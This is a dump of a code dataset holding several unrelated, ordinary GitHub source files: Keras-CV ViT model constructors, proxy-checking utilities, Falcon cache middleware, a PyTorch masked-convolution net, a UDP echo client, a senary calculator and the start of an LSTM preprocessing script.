weights=None,\n    input_shape=(None, None, 3),\n    input_tensor=None,\n    pooling=None,\n    num_classes=None,\n    activation=keras.activations.gelu,\n    classifier_activation=\"softmax\",\n    **kwargs,\n):\n    \"\"\"Instantiates the ViTB16 architecture.\"\"\"\n\n    return ViT(\n        include_rescaling,\n        include_top,\n        name=name,\n        weights=parse_weights(weights, include_top, \"vitb16\"),\n        input_shape=input_shape,\n        input_tensor=input_tensor,\n        pooling=pooling,\n        num_classes=num_classes,\n        patch_size=MODEL_CONFIGS[\"ViTB16\"][\"patch_size\"],\n        transformer_layer_num=MODEL_CONFIGS[\"ViTB16\"][\"transformer_layer_num\"],\n        project_dim=MODEL_CONFIGS[\"ViTB16\"][\"project_dim\"],\n        mlp_dim=MODEL_CONFIGS[\"ViTB16\"][\"mlp_dim\"],\n        num_heads=MODEL_CONFIGS[\"ViTB16\"][\"num_heads\"],\n        mlp_dropout=MODEL_CONFIGS[\"ViTB16\"][\"mlp_dropout\"],\n        attention_dropout=MODEL_CONFIGS[\"ViTB16\"][\"attention_dropout\"],\n        activation=activation,\n        classifier_activation=classifier_activation,\n        **kwargs,\n    )\n\n\ndef ViTL16(\n    *,\n    include_rescaling,\n    include_top,\n    name=\"ViTL16\",\n    weights=None,\n    input_shape=(None, None, 3),\n    input_tensor=None,\n    pooling=None,\n    num_classes=None,\n    activation=keras.activations.gelu,\n    classifier_activation=\"softmax\",\n    **kwargs,\n):\n    \"\"\"Instantiates the ViTL16 architecture.\"\"\"\n\n    return ViT(\n        include_rescaling,\n        include_top,\n        name=name,\n        weights=parse_weights(weights, include_top, \"vitl16\"),\n        input_shape=input_shape,\n        input_tensor=input_tensor,\n        pooling=pooling,\n        num_classes=num_classes,\n        patch_size=MODEL_CONFIGS[\"ViTL16\"][\"patch_size\"],\n        transformer_layer_num=MODEL_CONFIGS[\"ViTL16\"][\"transformer_layer_num\"],\n        project_dim=MODEL_CONFIGS[\"ViTL16\"][\"project_dim\"],\n        mlp_dim=MODEL_CONFIGS[\"ViTL16\"][\"mlp_dim\"],\n        num_heads=MODEL_CONFIGS[\"ViTL16\"][\"num_heads\"],\n        mlp_dropout=MODEL_CONFIGS[\"ViTL16\"][\"mlp_dropout\"],\n        attention_dropout=MODEL_CONFIGS[\"ViTL16\"][\"attention_dropout\"],\n        activation=activation,\n        classifier_activation=classifier_activation,\n        **kwargs,\n    )\n\n\n
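# A minimal usage sketch (not part of the original module; the input shape and\n# class count are illustrative assumptions):\n#\n#     model = ViTTiny16(\n#         include_rescaling=True,\n#         include_top=True,\n#         num_classes=10,\n#         input_shape=(224, 224, 3),\n#     )\n#     model.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\")\n\n\ndef ViTH16(\n    *,\n    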
include_rescaling,\n include_top,\n name=\"ViTH16\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTH16 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTH16\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTH16\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTH16\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTH16\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTH16\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTH16\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTH16\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTTiny32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTTiny32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTTiny32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTTiny32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTTiny32\"][\n \"transformer_layer_num\"\n ],\n project_dim=MODEL_CONFIGS[\"ViTTiny32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTTiny32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTTiny32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTTiny32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTTiny32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTS32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTS32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTS32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, \"vits32\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTS32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTS32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTS32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTS32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTS32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTS32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTS32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTB32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTB32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTB32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=parse_weights(weights, include_top, 
\"vitb32\"),\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTB32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTB32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTB32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTB32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTB32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTB32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTB32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTL32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTL32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTL32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTL32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTL32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTL32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTL32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTL32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTL32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTL32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\ndef ViTH32(\n *,\n include_rescaling,\n include_top,\n name=\"ViTH32\",\n weights=None,\n input_shape=(None, None, 3),\n input_tensor=None,\n pooling=None,\n num_classes=None,\n activation=keras.activations.gelu,\n classifier_activation=\"softmax\",\n **kwargs,\n):\n \"\"\"Instantiates the ViTH32 architecture.\"\"\"\n\n return ViT(\n include_rescaling,\n include_top,\n name=name,\n weights=weights,\n input_shape=input_shape,\n input_tensor=input_tensor,\n pooling=pooling,\n num_classes=num_classes,\n patch_size=MODEL_CONFIGS[\"ViTH32\"][\"patch_size\"],\n transformer_layer_num=MODEL_CONFIGS[\"ViTH32\"][\"transformer_layer_num\"],\n project_dim=MODEL_CONFIGS[\"ViTH32\"][\"project_dim\"],\n mlp_dim=MODEL_CONFIGS[\"ViTH32\"][\"mlp_dim\"],\n num_heads=MODEL_CONFIGS[\"ViTH32\"][\"num_heads\"],\n mlp_dropout=MODEL_CONFIGS[\"ViTH32\"][\"mlp_dropout\"],\n attention_dropout=MODEL_CONFIGS[\"ViTH32\"][\"attention_dropout\"],\n activation=activation,\n classifier_activation=classifier_activation,\n **kwargs,\n )\n\n\nsetattr(ViTTiny16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTTiny16\"))\nsetattr(ViTS16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTS16\"))\nsetattr(ViTB16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTB16\"))\nsetattr(ViTL16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTL16\"))\nsetattr(ViTH16, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTH16\"))\nsetattr(ViTTiny32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTTiny32\"))\nsetattr(ViTS32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTS32\"))\nsetattr(ViTB32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTB32\"))\nsetattr(ViTL32, \"__doc__\", BASE_DOCSTRING.format(name=\"ViTL32\"))\nsetattr(ViTH32, \"__doc__\", 
BASE_DOCSTRING.format(name=\"ViTH32\"))\n","repo_name":"keras-team/keras-cv","sub_path":"keras_cv/models/legacy/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":25241,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"67"} +{"seq_id":"26754712106","text":"from json import dumps\nfrom json import loads\nfrom typing import Dict\nfrom typing import Generator\nfrom urllib.parse import urlparse\n\nfrom pymongo.cursor import Cursor\nfrom pymongo import MongoClient\nfrom pymongo.collection import Collection\n\nfrom inspect_proxies.utils import InspectResult\nfrom inspect_proxies.utils import pp\n\n\ndef total_numbers(func):\n\n numbers = {'invalid': 0, 'valid': 0}\n\n def wrapper(doc, *args, **kwargs):\n if doc.get('exception') and doc.get('exception') != 'None':\n numbers['invalid'] += 1\n else:\n numbers['valid'] += 1\n\n res = func(doc, *args, **kwargs)\n print(numbers)\n\n return res\n\n return wrapper\n\n\ndef collect_invalid_ips(func):\n import datetime\n from os.path import abspath\n from os.path import dirname\n path = dirname(dirname(dirname(abspath(__file__))))\n with open('{}/invalid_ips.txt'.format(path), 'a') as f:\n f.write('\\n\\n\\n{} invalid proxy\\n'.format(datetime.datetime.today()))\n\n def wrapper(doc, *args, **kwargs):\n if doc.error and doc.error != 'None':\n proxy = parse_requests_proxy(doc.proxy)\n with open('{}/invalid_ips.txt'.format(path), 'a') as f:\n f.write('ip:{} port:{}\\n'.format(proxy['ip'], proxy['port']))\n\n res = func(doc, *args, **kwargs)\n\n return res\n\n return wrapper\n\n\ndef _parse_auth_uri(uri: str) -> Dict:\n if '@' in uri:\n split_res = uri.split('@')\n user, pwd = split_res[0].split(':')\n host, port = split_res[1].split(':')\n else:\n user, pwd = (None, None)\n host, port = uri.split(':')\n return {\n 'username': user,\n 'password': pwd,\n 'ip': host,\n 'port': int(port)\n }\n\n\ndef parse_requests_proxy(proxy: Dict) -> Dict:\n \"\"\"\n :param proxy: {'http': 'http://...'}\n :return: Dict: keys include username, password, ip, port\n \"\"\"\n for scheme, p in proxy.items():\n res = {'scheme': scheme}\n auth = urlparse(p).netloc\n res.update(_parse_auth_uri(auth))\n return res\n\n\ndef output_format_view_proxy(doc: InspectResult) -> Dict:\n \"\"\"\n Handle result of output_format view proxy document\n :param doc:\n :return:\n \"\"\"\n res = output_format(doc)\n del res['proxy']\n res['exception'] = str(res['exception'])\n res.update(parse_requests_proxy(doc.proxy))\n return res\n\n\n@collect_invalid_ips\ndef output_format_filter_invalid_proxy(doc: InspectResult) -> Dict:\n \"\"\"\n Handle result of output_format view proxy document\n :param doc:\n :return:\n \"\"\"\n res = output_format(doc)\n if res['exception'] is None and res['status'] == 200:\n del res['proxy']\n del res['exception']\n res.update(parse_requests_proxy(doc.proxy))\n return res\n else:\n return dict()\n\n\ndef output_format(doc: InspectResult) -> Dict:\n \"\"\"\n from once inspect result extract message\n :param doc: result of inspect proxy\n :return:\n \"\"\"\n resp = doc.response\n if resp:\n seconds = resp.elapsed.total_seconds()\n status = resp.status_code\n else:\n seconds = None\n status = None\n return {\n 'proxy': dumps(doc.proxy),\n 'url': doc.url,\n 'spend_time': seconds,\n 'status': status,\n 'exception': type(doc.error) if doc.error is not None else None\n }\n\n\n@total_numbers\ndef output_position_console(doc: Dict):\n\n pp.pprint(doc)\n\n\ndef output_position_mongodb(doc: Dict, coll: Collection):\n if 
doc:\n coll.insert_one(doc)\n\n\ndef create_request_proxy(line: [str, Dict]) -> Dict:\n \"\"\"\n :param line: dict or json\n {'ip': '', 'port': '', 'username': '', 'password':'', 'scheme': ''}\n :return: dict: {'scheme': 'proxy'}\n \"\"\"\n if type(line) is str:\n line = loads(line.strip(',').replace(\"'\", '\"'))\n if type(line) is not dict:\n raise TypeError(\n \"excepted type of line is dict, is not {}\".format(type(line))\n )\n if not line:\n return {}\n if line.get('username'):\n return {\n line['scheme']: '{scheme}://{username}:{password}@'\n '{ip}:{port}'.format(\n scheme=line['scheme'], username=line['username'],\n password=line['password'], ip=line.get('ip') or line['domain'],\n port=line.get('port', 80 if line['scheme'] == 'http' else 443)\n )\n }\n else:\n return {\n line['scheme']: '{scheme}://{ip}:{port}'.format(\n scheme=line['scheme'],\n ip=line.get('ip') or line['domain'],\n port=line.get('port', 80 if line['scheme'] == 'http' else 443)\n )\n }\n\n\ndef file_storage(path: str) -> Generator:\n \"\"\"\n :param path: file path\n :return: line\n \"\"\"\n with open(path) as f:\n for _ in f:\n line = _.strip()\n if line:\n yield line\n\n\ndef mongodb_storage(\n mongo_uri: str, db: str, coll: str, _filter: Dict={}\n) -> Cursor:\n client = MongoClient(mongo_uri)\n coll = client[db][coll]\n return coll.find(_filter, no_cursor_timeout=False)\n\n\nif __name__ == '__main__':\n storage = file_storage('../../tests/docs/proxies_demo.txt')\n for i in storage:\n print(create_request_proxy(i))\n","repo_name":"for-mao/inspect-proxies","sub_path":"inspect_proxies/utils/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38547203968","text":"\"\"\"Falcon cache provider middleware module.\"\"\"\n# third-party\nimport falcon\n\n\nclass CacheMiddleware:\n \"\"\"Cache middleware module.\n\n Args:\n provider (CacheProvider): An instance of cache provider (memcache or Redis).\n \"\"\"\n\n def __init__(self, provider: object):\n \"\"\"Initialize class properties.\"\"\"\n self.provider = provider\n\n def _testing(self, req):\n \"\"\"Update req context with values for testing.\"\"\"\n if hasattr(self, 'user_key'):\n # inject a test user_key for pytest monkeypatch\n req.context.user_key = self.user_key # pylint: disable=no-member\n\n def process_resource(\n self, req: falcon.Request, resp: falcon.Response, resource: object, params: dict\n ): # pylint: disable=unused-argument\n \"\"\"Process the request after routing and provide caching service.\"\"\"\n # for pytest testing\n self._testing(req)\n\n # update the cache control for the current resource\n cache_control = {}\n if hasattr(resource, 'cache_control') and isinstance(resource.cache_control, dict):\n cache_control = resource.cache_control\n\n # update cache control\n self.provider.cache_control(cache_control)\n\n if self.provider.enabled:\n cache_key = self.provider.cache_key(req, resource)\n try:\n cache_data = self.provider.get_cache(cache_key)\n except Exception as e: # pragma: no cover; pylint: disable=broad-except\n # cache is best effort, process normally if cache not available\n cache_data = None\n if hasattr(resource, 'log'):\n resource.log.error(f'[cache-provider] Failed reading from cache ({e}).')\n\n if cache_data is not None:\n resp.context.setdefault('cache_data', cache_data)\n resp.context['response_cached'] = True\n resp.complete = True # signal short-circuit for response processing\n\n def 
process_response(\n        self, req: falcon.Request, resp: falcon.Response, resource: object, req_succeeded: bool\n    ):\n        \"\"\"Set or delete cache for provided resources.\"\"\"\n        if not self.provider.enabled:\n            return\n\n        if req_succeeded and self.provider.enabled:\n            resp.set_header('X-Cache', 'MISS')  # set x-cache header to default of no cache\n            cache_key: str = self.provider.cache_key(req, resource)\n\n            if req.method in self.provider.methods:\n                if resp.context.get('cache_data') is not None:\n                    # set body to cached data and stop response\n                    resp.set_header('X-Cache', 'HIT')  # update x-cache header for HIT (from cache)\n                    resp.text = resp.context.get('cache_data')\n                elif resp.text is not None:\n                    # cache data\n                    try:\n                        self.provider.set_cache(cache_key, resp.text)\n                    except Exception as e:  # pragma: no cover; pylint: disable=broad-except\n                        # cache is best effort, process normally if cache not available\n                        if hasattr(resource, 'log'):\n                            resource.log.error(f'[cache-provider] Failed writing to cache ({e}).')\n","repo_name":"bcsummers/falcon-provider-cache","sub_path":"falcon_provider_cache/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"}
+{"seq_id":"13681150632","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass MaskedConv2d(nn.Conv2d):\n    def __init__(self, in_channels, out_channels, kernel_size, stride=1, \\\n                 padding=0, dilation=1, groups=1, bias=False, use_gpu=False):\n        super(MaskedConv2d, self).__init__(in_channels, out_channels,\n                                           kernel_size, stride, padding,\n                                           dilation, groups, bias)\n        self.masked_channels = []\n        self.mask_flag = False\n        self.masks = None\n        self.use_gpu = use_gpu\n\n    def forward(self, x):\n        if self.mask_flag == True:\n            self._expand_masks(x.size())\n            weight = self.weight * self.masks\n            return F.conv2d(x, weight, self.bias, self.stride, self.padding,\n                            self.dilation, self.groups)\n        else:\n            return F.conv2d(x, self.weight, self.bias, self.stride,\n                            self.padding, self.dilation, self.groups)\n\n\n    def set_masked_channels(self, masked_channels):\n        self.masked_channels = masked_channels\n        if len(masked_channels) == 0:\n            self.mask_flag = False\n        else:\n            self.mask_flag = True\n\n    def get_masked_channels(self):\n        return self.masked_channels\n\n    def _expand_masks(self, input_size):\n        # Build a weight-shaped mask that zeroes every pruned output channel.\n        # Only the weight's own shape matters here; input_size is kept for\n        # compatibility with the call in forward().\n        if len(self.masked_channels) == 0:\n            self.masks = None\n            return\n        masks = torch.ones_like(self.weight.data)\n        for channel in self.masked_channels:\n            masks[channel, :, :, :] = 0.0\n        if self.use_gpu:\n            masks = masks.cuda()\n        self.masks = Variable(masks, requires_grad=False)\n\n\nclass CustomNet(nn.Module):\n    def __init__(self, num_classes, use_gpu=False):\n        super(CustomNet, self).__init__()\n        self.conv1_1 = MaskedConv2d(3, 64, 3, padding=1, use_gpu=use_gpu)\n        self.conv2_1 = MaskedConv2d(64, 128, 3, padding=1, use_gpu=use_gpu)\n        self.conv3_1 = MaskedConv2d(128, 256, 3, padding=1, use_gpu=use_gpu)\n\n        self.fc1 = nn.Linear(4096, 4096)\n        self.fc2 = nn.Linear(4096, num_classes)\n        self.softmax = nn.Softmax(dim=1)\n\n    def forward(self, x):\n        out = F.relu(self.conv1_1(x))\n        out = F.max_pool2d(out, 2)\n\n        out = F.relu(self.conv2_1(out))\n        out = F.max_pool2d(out, 2)\n\n        out = F.relu(self.conv3_1(out))\n        out = F.max_pool2d(out, 2)\n\n        
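# Flatten the pooled feature maps from (N, C, H, W) to (N, C*H*W) for the dense head\n        out = 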
out.view(out.size(0), -1)\n out = F.relu(self.fc1(out))\n out = F.relu(self.fc2(out))\n return self.softmax(out)\n","repo_name":"lionminhu/structured-sparsity-learning","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"24222351485","text":"import socket\r\nimport datetime\r\n\r\nclientSocket = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)\r\nechoServerIP = input(\"Enter the IP address of the echo server\")\r\nechoServerPort = int(input(\"Enter the port number of the echo server\"))\r\nechoMSG = \"echo message\"\r\naverageRTT = 0\r\n\r\nfor i in range (0,5):\r\n t1 = datetime.datetime.now()\r\n clientSocket.sendto(echoMSG.encode('utf-8'), (echoServerIP, echoServerPort))\r\n data, address = clientSocket.recvfrom(1024)\r\n t2 = datetime.datetime.now()\r\n averageRTT += (t2 - t1).microseconds\r\n print (\"Round trip time \", i+1, \" \", (t2-t1).microseconds, \"microseconds\")\r\n\r\naverageRTT = averageRTT/5\r\nprint('Average RTT: ', averageRTT, \" microseconds\")\r\nclientSocket.close()\r\n","repo_name":"OmarBekdache/EECE-350-assignment-1","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30939077113","text":"from typing import Callable\n\nfrom pathlib import Path\n\nimport sqlmodel\nfrom loguru import logger\n\nfrom ... import demo\n\nfrom .abstractions import DatabaseStorage\n\n\nclass DatabaseStorageImpl(DatabaseStorage):\n \"\"\"Database storage implementation.\"\"\"\n\n def __init__(self, store_demo_timetracking_dataframe: Callable, debug_mode: bool):\n # database config\n super().__init__()\n self.app_dir = self.ensure_app_dir()\n self.db_path = self.app_dir / \"tuttle.db\"\n self.store_demo_dataframe_callback = store_demo_timetracking_dataframe\n self.debug_mode = debug_mode\n\n def create_model(self):\n logger.info(\"Creating database model\")\n sqlmodel.SQLModel.metadata.create_all(self.db_engine, checkfirst=True)\n\n def ensure_database(self):\n if not self.db_path.exists():\n self.db_engine = sqlmodel.create_engine(\n f\"sqlite:///{self.db_path}\", echo=True\n )\n self.create_model()\n else:\n logger.info(\"Database exists, skipping creation\")\n\n def reset_database(self):\n logger.info(\"Clearing database\")\n try:\n self.db_path.unlink()\n except FileNotFoundError:\n logger.info(\"Database file not found, skipping delete\")\n self.db_engine = sqlmodel.create_engine(\n f\"sqlite:///{self.db_path}\",\n echo=self.debug_mode,\n )\n self.create_model()\n\n def install_demo_data(\n self,\n ):\n self.reset_database()\n try:\n demo.install_demo_data(\n n_projects=4,\n db_path=self.db_path,\n on_cache_timetracking_dataframe=self.store_demo_dataframe_callback,\n )\n logger.info(\"Demo data installation completed\")\n except Exception as ex:\n logger.exception(ex)\n logger.error(\"Failed to install demo data\")\n\n def ensure_app_dir(self) -> Path:\n app_dir = Path.home() / \".tuttle\"\n if not app_dir.exists():\n app_dir.mkdir(parents=True)\n return app_dir\n","repo_name":"tuttle-dev/tuttle","sub_path":"tuttle/app/core/database_storage_impl.py","file_name":"database_storage_impl.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"67"} +{"seq_id":"41749837337","text":"class Senary:\n \"\"\"Class that 
implements operations on numbers in the senary numeral system.\"\"\"\n\n    def __init__(self, value: int):\n        \"\"\"Initialize the Senary object with a decimal value.\"\"\"\n        self.value = value\n\n    def __add__(self, other: 'Senary') -> 'Senary':\n        \"\"\"Add two senary numbers and return the result as a Senary object.\"\"\"\n        return Senary(self.value + other.value)\n\n    def __sub__(self, other: 'Senary') -> 'Senary':\n        \"\"\"Subtract two senary numbers and return the result as a Senary object.\"\"\"\n        return Senary(self.value - other.value)\n\n    def __int__(self) -> int:\n        \"\"\"Convert the Senary object to a decimal integer.\"\"\"\n        return self.value\n\n    @staticmethod\n    def from_senary(senary_str: str) -> 'Senary':\n        \"\"\"Convert a senary string to a Senary object.\"\"\"\n        # Check if the senary string is negative\n        negative = False\n        if senary_str[0] == \"-\":\n            negative = True\n            senary_str = senary_str[1:]\n        # Convert the senary string to a decimal integer\n        decimal = 0\n        for i, char in enumerate(reversed(senary_str)):\n            decimal += int(char) * (6 ** i)\n        # If the senary string was negative, negate the decimal value\n        if negative:\n            decimal = -decimal\n        # Return the decimal value as a Senary object\n        return Senary(decimal)\n\n    def to_senary(self) -> str:\n        \"\"\"Convert the Senary object to a senary string.\"\"\"\n        value = self.value\n        # Zero has no digits to peel off, so handle it up front\n        if value == 0:\n            return \"0\"\n        negative = value < 0\n        value = abs(value)\n        senary = \"\"\n        while value > 0:\n            senary = str(value % 6) + senary\n            value = value // 6\n        return \"-\" + senary if negative else senary\n\n\nclass SenaryCalculator:\n    \"\"\"Class that implements a menu for performing operations on numbers in the senary numeral system.\"\"\"\n\n    def __init__(self):\n        \"\"\"Initialize the SenaryCalculator object.\"\"\"\n        self.menu = \"\"\"\n        Senary Calculator\n\n        1. Add two senary numbers\n        2. Subtract two senary numbers\n        3. Convert a senary string to a decimal integer\n        4. Convert a decimal integer to a senary string\n        5. Exit\n\n        Enter your choice (1-5): \"\"\"\n\n    
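# A quick round-trip sketch of the helpers above (illustrative only):\n    #\n    #     Senary.from_senary(\"-25\").value   # -> -17  (2*6 + 5 = 17)\n    #     Senary(-17).to_senary()           # -> \"-25\"\n\n    def handle_input_error(self) -> None:\n        \"\"\"Handle input errors.\"\"\"\n        print(\"Invalid input. 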
Try again.\")\n\n def add_senary_numbers(self) -> None:\n \"\"\"Add two senary numbers.\"\"\"\n try:\n a = Senary.from_senary(input(\"Enter the first senary number: \"))\n b = Senary.from_senary(input(\"Enter the second senary number: \"))\n print(\"The result is:\", (a + b).to_senary())\n except ValueError:\n self.handle_input_error()\n\n def subtract_senary_numbers(self) -> None:\n \"\"\"Subtract two senary numbers.\"\"\"\n try:\n a = Senary.from_senary(input(\"Enter the first senary number: \"))\n b = Senary.from_senary(input(\"Enter the second senary number: \"))\n print(\"The result is:\", (a - b).to_senary())\n except ValueError:\n self.handle_input_error()\n\n def convert_senary_to_decimal(self) -> None:\n \"\"\"Convert a senary string to a decimal integer.\"\"\"\n try:\n senary_str = input(\"Enter a senary number: \")\n decimal = int(Senary.from_senary(senary_str))\n print(\"The equivalent decimal number is:\", decimal)\n except ValueError:\n self.handle_input_error()\n\n def convert_decimal_to_senary(self) -> None:\n \"\"\"Convert a decimal integer to a senary string.\"\"\"\n try:\n decimal = int(input(\"Enter a decimal number: \"))\n senary = Senary(decimal).to_senary()\n print(\"The equivalent senary number is:\", senary)\n except ValueError:\n self.handle_input_error()\n\n def run(self) -> None:\n \"\"\"Run the SenaryCalculator menu.\"\"\"\n while True:\n # Display the menu\n choice = input(self.menu)\n\n # Validate the choice\n try:\n choice = int(choice)\n if choice < 1 or choice > 5:\n raise ValueError\n except ValueError:\n print(\"Invalid option. Try again.\")\n continue\n\n # Perform the selected operation\n if choice == 1:\n self.add_senary_numbers()\n elif choice == 2:\n self.subtract_senary_numbers()\n elif choice == 3:\n self.convert_senary_to_decimal()\n elif choice == 4:\n self.convert_decimal_to_senary()\n elif choice == 5:\n print(\"Exiting the program.\")\n break\n\n\n# calculator = SenaryCalculator()\n# calculator.run()\n","repo_name":"cobaltCorsair/senary_calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70942439","text":"from keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Dropout, Bidirectional, TimeDistributed\nfrom keras.optimizers import Adam\nimport pandas as pd \nfrom datetime import datetime\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib import rcParams\nimport pickle\n\nSPLIT = .7\nTIMESTEPS = 7\nMIN_CORR = .5\n\n\nclass Preprocess():\n \"\"\"Data preprocessor class for the LSTM model.\n \n Parameters\n ----------\n corr_limit : Float\n Minimum level of correlation among features\n \n Attributes\n -------\n corr_limit : Float\n Minimum level of correlation among features\n \n Methods\n -------\n loadData()\n Data loader\n selectFeatures(dataframe, target)\n Selector of the features according to their correlation\n reshapeData(data)\n Data reshaper\n descaleData(y_hat)\n Data descaler\n scaleData(X_toScale, *y)\n Data scaler\n \"\"\"\n def __init__(self, corr_limit):\n self.corr_limit = corr_limit\n\n def loadData(self):\n \"\"\"Load the data from a .csv file and put them\n into a Pandas Dataframe.\n \n Returns\n -------\n pandas.DataFrame, numpy.ndarray\n Dataframe containing the data and the relative array of labels\n \"\"\"\n # Read Offerte Pubbliche \n off = (\n pd\n .read_csv('../data/bid.csv', index_col='Unnamed: 0')\n 
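# keep only the daily offered quantity; price and award columns are dropped below\n            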
